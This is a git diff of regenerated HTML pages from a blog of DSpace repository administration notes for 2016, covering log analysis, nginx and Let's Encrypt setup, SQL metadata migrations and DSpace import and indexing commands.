@ -423,7 +423,7 @@ UPDATE 46075
<li>Looks like the last one was &ldquo;down&rdquo; from about four hours ago</li>
<li>I think there must be something with this REST stuff:</li>
</ul>
<pre><code># grep -c &quot;Aborting context in finally statement&quot; dspace.log.2016-04-*
<pre tabindex="0"><code># grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-*
dspace.log.2016-04-01:0
dspace.log.2016-04-02:0
dspace.log.2016-04-03:0
@ -468,7 +468,7 @@ dspace.log.2016-04-27:7271
<ul>
<li>Logs for today and yesterday have zero references to this REST error, so I&rsquo;m going to open back up the REST API but log all requests</li>
</ul>
<pre><code>location /rest {
<pre tabindex="0"><code>location /rest {
access_log /var/log/nginx/rest.log;
proxy_pass http://127.0.0.1:8443;
}
@ -495,15 +495,15 @@ dspace.log.2016-04-27:7271
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -116,7 +116,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<time datetime="2016-05-01T23:06:00+03:00">Sun May 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -126,13 +126,13 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<li>I have blocked access to the API now</li>
<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
</code></pre><ul>
<li>The two most often requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29</li>
<li>100% of the requests coming from Ethiopia are like this and result in an HTTP 500:</li>
</ul>
<pre><code>GET /rest/handle/10568/NaN?expand=parentCommunityList,metadata HTTP/1.1
<pre tabindex="0"><code>GET /rest/handle/10568/NaN?expand=parentCommunityList,metadata HTTP/1.1
</code></pre><ul>
<li>For now I&rsquo;ll block just the Ethiopian IP</li>
<li>The owner of that application has said that the <code>NaN</code> (not a number) is an error in his code and he&rsquo;ll fix it</li>
@ -152,7 +152,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<li>I will re-generate the Discovery indexes after re-deploying</li>
<li>Testing <code>renew-letsencrypt.sh</code> script for nginx</li>
</ul>
<pre><code>#!/usr/bin/env bash
<pre tabindex="0"><code>#!/usr/bin/env bash
readonly SERVICE_BIN=/usr/sbin/service
readonly LETSENCRYPT_BIN=/opt/letsencrypt/letsencrypt-auto
@ -166,8 +166,8 @@ LE_RESULT=$?
$SERVICE_BIN nginx start
if [[ &quot;$LE_RESULT&quot; != 0 ]]; then
echo 'Automated renewal failed:'
if [[ &#34;$LE_RESULT&#34; != 0 ]]; then
echo &#39;Automated renewal failed:&#39;
cat /var/log/letsencrypt/renew.log
@ -214,7 +214,7 @@ fi
<p>After completing the rebase I tried to build with the module versions Atmire had indicated as being 5.5 ready but I got this error:</p>
</li>
</ul>
<pre><code>[ERROR] Failed to execute goal on project additions: Could not resolve dependencies for project org.dspace.modules:additions:jar:5.5: Could not find artifact com.atmire:atmire-metadata-quality-api:jar:5.5-2.10.1-0 in sonatype-releases (https://oss.sonatype.org/content/repositories/releases/) -&gt; [Help 1]
<pre tabindex="0"><code>[ERROR] Failed to execute goal on project additions: Could not resolve dependencies for project org.dspace.modules:additions:jar:5.5: Could not find artifact com.atmire:atmire-metadata-quality-api:jar:5.5-2.10.1-0 in sonatype-releases (https://oss.sonatype.org/content/repositories/releases/) -&gt; [Help 1]
</code></pre><ul>
<li>I&rsquo;ve sent them a question about it</li>
<li>A user mentioned having problems with uploading a 33 MB PDF</li>
@ -240,7 +240,7 @@ fi
</li>
<li>Found ~200 messed up CIAT values in <code>dc.publisher</code>:</li>
</ul>
<pre><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &quot;% %&quot;;
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &#34;% %&#34;;
</code></pre><h2 id="2016-05-13">2016-05-13</h2>
<ul>
<li>More theorizing about CGcore</li>
@ -259,7 +259,7 @@ fi
<li>They have thumbnails on Flickr and elsewhere</li>
<li>In OpenRefine I created a new <code>filename</code> column based on the <code>thumbnail</code> column with the following GREL:</li>
</ul>
<pre><code>if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
<pre tabindex="0"><code>if(cells[&#39;thumbnails&#39;].value.contains(&#39;hqdefault&#39;), cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-2] + &#39;.jpg&#39;, cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-1])
</code></pre><ul>
<li>Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL</li>
<li>So for the <code>hqdefault.jpg</code> ones I just take the UUID (-2) and use it as the filename</li>
@ -269,7 +269,7 @@ fi
<ul>
<li>More quality control on <code>filename</code> field of CCAFS records to make processing in shell and SAFBuilder more reliable:</li>
</ul>
<pre><code>value.replace('_','').replace('-','')
<pre tabindex="0"><code>value.replace(&#39;_&#39;,&#39;&#39;).replace(&#39;-&#39;,&#39;&#39;)
</code></pre><ul>
<li>We need to hold off on moving <code>dc.Species</code> to <code>cg.species</code> because it is only used for plants, and might be better to move it to something like <code>cg.species.plant</code></li>
<li>And <code>dc.identifier.fund</code> is MOSTLY used for CPWF project identifier but has some other sponsorship things
@ -281,17 +281,17 @@ fi
</ul>
</li>
</ul>
<pre><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
</code></pre><h2 id="2016-05-20">2016-05-20</h2>
<ul>
<li>More work on CCAFS Video and Images records</li>
<li>For SAFBuilder we need to modify filename column to have the thumbnail bundle:</li>
</ul>
<pre><code>value + &quot;__bundle:THUMBNAIL&quot;
<pre tabindex="0"><code>value + &#34;__bundle:THUMBNAIL&#34;
</code></pre><ul>
<li>Also, I fixed some weird characters using OpenRefine&rsquo;s transform with the following GREL:</li>
</ul>
<pre><code>value.replace(/\u0081/,'')
<pre tabindex="0"><code>value.replace(/\u0081/,&#39;&#39;)
</code></pre><ul>
<li>Write shell script to resize thumbnails with height larger than 400: <a href="https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256">https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256</a></li>
<li>Upload 707 CCAFS records to DSpace Test</li>
@ -309,12 +309,12 @@ fi
<ul>
<li>Export CCAFS video and image records from DSpace Test using the migrate option (<code>-m</code>):</li>
</ul>
<pre><code>$ mkdir ~/ccafs-images
<pre tabindex="0"><code>$ mkdir ~/ccafs-images
$ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~/ccafs-images -n 0 -m
</code></pre><ul>
<li>And then import to CGSpace:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
</code></pre><ul>
<li>But now we have double authors for &ldquo;CGIAR Research Program on Climate Change, Agriculture and Food Security&rdquo; in the authority</li>
<li>I&rsquo;m trying to do a Discovery index before messing with the authority index</li>
@ -322,19 +322,19 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
<li>Run system updates on DSpace Test, re-deploy code, and reboot the server</li>
<li>Clean up and import ~200 CTA records to CGSpace via CSV like:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;
$ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &amp;&gt; ~/CTA-May30/CTA-42229.log
</code></pre><ul>
<li>Discovery indexing took a few hours for some reason, and after that I started the <code>index-authority</code> script</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace index-authority
</code></pre><h2 id="2016-05-31">2016-05-31</h2>
<ul>
<li>The <code>index-authority</code> script ran over night and was finished in the morning</li>
<li>Hopefully this was because we haven&rsquo;t been running it regularly and it will speed up next time</li>
<li>I am running it again with a timer to see:</li>
</ul>
<pre><code>$ time /home/cgspace.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ time /home/cgspace.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Cleaning the old index
@ -371,15 +371,15 @@ sys 0m20.540s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec
You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ Working on second phase of metadata migration, looks like this will work for mov
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -116,7 +116,7 @@ Working on second phase of metadata migration, looks like this will work for mov
<time datetime="2016-06-01T10:53:00+03:00">Wed Jun 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -129,7 +129,7 @@ Working on second phase of metadata migration, looks like this will work for mov
<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li>
<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li>
</ul>
<pre><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
UPDATE 497
dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
UPDATE 14
@ -141,7 +141,7 @@ UPDATE 14
<li>Testing the configuration and theme changes for the upcoming metadata migration and I found some issues with <code>cg.coverage.admin-unit</code></li>
<li>Seems that the Browse configuration in <code>dspace.cfg</code> can&rsquo;t handle the &lsquo;-&rsquo; in the field name:</li>
</ul>
<pre><code>webui.browse.index.12 = subregion:metadata:cg.coverage.admin-unit:text
<pre tabindex="0"><code>webui.browse.index.12 = subregion:metadata:cg.coverage.admin-unit:text
</code></pre><ul>
<li>But actually, I think since DSpace 4 or 5 (we are 5.1) the Browse indexes come from Discovery (defined in discovery.xml) so this is really just a parsing error</li>
<li>I&rsquo;ve sent a message to the DSpace mailing list to ask about the Browse index definition</li>
@ -154,13 +154,13 @@ UPDATE 14
<li>Investigating the CCAFS authority issue, I exported the metadata for the Videos collection</li>
<li>The top two authors are:</li>
</ul>
<pre><code>CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::500
<pre tabindex="0"><code>CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::500
CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::600
</code></pre><ul>
<li>So the only difference is the &ldquo;confidence&rdquo;</li>
<li>Ok, well THAT is interesting:</li>
</ul>
<pre><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, A. | ab606e3a-2b04-4c7d-9423-14beccf54257 | -1
@ -180,13 +180,13 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
</code></pre><ul>
<li>And now an actually relevent example:</li>
</ul>
<pre><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence = 500;
count
-------
707
(1 row)
dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence != 500;
count
-------
253
@ -194,14 +194,14 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and te
</code></pre><ul>
<li>Trying something experimental:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
UPDATE 960
</code></pre><ul>
<li>And then re-indexing authority and Discovery&hellip;?</li>
<li>After Discovery reindex the CCAFS authors are all together in the Authors sidebar facet</li>
<li>The docs for the ORCiD and Authority stuff for DSpace 5 mention changing the browse indexes to use the Authority as well:</li>
</ul>
<pre><code>webui.browse.index.2 = author:metadataAuthority:dc.contributor.author:authority
<pre tabindex="0"><code>webui.browse.index.2 = author:metadataAuthority:dc.contributor.author:authority
</code></pre><ul>
<li>That would only be for the &ldquo;Browse by&rdquo; function&hellip; so we&rsquo;ll have to see what effect that has later</li>
</ul>
@ -215,7 +215,7 @@ UPDATE 960
<ul>
<li>Figured out how to export a list of the unique values from a metadata field ordered by count:</li>
</ul>
<pre><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=29 group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=29 group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
</code></pre><ul>
<li>
<p>Identified the next round of fields to migrate:</p>
@ -244,7 +244,7 @@ UPDATE 960
<li>Looks like this is all we need: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies">https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies</a></li>
<li>I wrote an XPath expression to extract the ILRI subjects from <code>input-forms.xml</code> (from the xmlstarlet package):</li>
</ul>
<pre><code>$ xml sel -t -m '//value-pairs[@value-pairs-name=&quot;ilrisubject&quot;]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xml sel -t -m &#39;//value-pairs[@value-pairs-name=&#34;ilrisubject&#34;]/pair/displayed-value/text()&#39; -c &#39;.&#39; -n dspace/config/input-forms.xml
</code></pre><ul>
<li>Write to Atmire about the use of <code>atmire.orcid.id</code> to see if we can change it</li>
<li>Seems to be a virtual field that is queried from the authority cache&hellip; hmm</li>
@ -263,9 +263,9 @@ UPDATE 960
<li>It looks like the values are documented in <code>Choices.java</code></li>
<li>Experiment with setting all 960 CCAFS author values to be 500:</li>
</ul>
<pre><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
<pre tabindex="0"><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
UPDATE 960
</code></pre><ul>
<li>After the database edit, I did a full Discovery re-index</li>
@ -320,7 +320,7 @@ UPDATE 960
<ul>
<li>CGSpace&rsquo;s HTTPS certificate expired last night and I didn&rsquo;t notice, had to renew:</li>
</ul>
<pre><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &quot;/usr/bin/service nginx stop&quot; --post-hook &quot;/usr/bin/service nginx start&quot;
<pre tabindex="0"><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &#34;/usr/bin/service nginx stop&#34; --post-hook &#34;/usr/bin/service nginx start&#34;
</code></pre><ul>
<li>I really need to fix that cron job&hellip;</li>
</ul>
@ -328,8 +328,8 @@ UPDATE 960
<ul>
<li>Run the replacements/deletes for <code>dc.description.sponsorship</code> (investors) on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t &#39;correct investor&#39; -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
</code></pre><ul>
<li>The scripts for this are here:
<ul>
@ -346,7 +346,7 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
<li>There are still ~97 fields that weren&rsquo;t indicated to do anything</li>
<li>After the above deletions and replacements I regenerated a CSV and sent it to Peter <em>et al</em> to have a look</li>
</ul>
<pre><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=126 group by text_value order by count desc) to /tmp/contributors-june28.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=126 group by text_value order by count desc) to /tmp/contributors-june28.csv with csv;
</code></pre><ul>
<li>Re-evaluate <code>dc.contributor.corporate</code> and it seems we will move it to <code>dc.contributor.author</code> as this is more in line with how editors are actually using it</li>
</ul>
@ -354,7 +354,7 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
<ul>
<li>Test run of <code>migrate-fields.sh</code> with the following re-mappings:</li>
</ul>
<pre><code>72 55 #dc.source
<pre tabindex="0"><code>72 55 #dc.source
86 230 #cg.contributor.crp
91 211 #cg.contributor.affiliation
94 212 #cg.species
@ -367,9 +367,9 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
</code></pre><ul>
<li>Run all cleanups and deletions of <code>dc.contributor.corporate</code> on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t &#39;Correct style&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t &#39;should be&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Re-deploy CGSpace and DSpace Test with latest June changes</li>
<li>Now the sharing and Altmetric bits are more prominent:</li>
@ -383,11 +383,11 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
<ul>
<li>Wow, there are 95 authors in the database who have &lsquo;,&rsquo; at the end of their name:</li>
</ul>
<pre><code># select text_value from metadatavalue where metadata_field_id=3 and text_value like '%,';
<pre tabindex="0"><code># select text_value from metadatavalue where metadata_field_id=3 and text_value like &#39;%,&#39;;
</code></pre><ul>
<li>We need to use something like this to fix them, need to write a proper regex later:</li>
</ul>
<pre><code># update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
<pre tabindex="0"><code># update metadatavalue set text_value = regexp_replace(text_value, &#39;(Poole, J),&#39;, &#39;\1&#39;) where metadata_field_id=3 and text_value = &#39;Poole, J,&#39;;
</code></pre>
@ -409,15 +409,15 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
In this case the select query was showing 95 results before the update
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -74,12 +74,12 @@ In this case the select query was showing 95 results before the update
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -126,7 +126,7 @@ In this case the select query was showing 95 results before the update
<time datetime="2016-07-01T10:53:00+03:00">Fri Jul 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -135,9 +135,9 @@ In this case the select query was showing 95 results before the update
<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
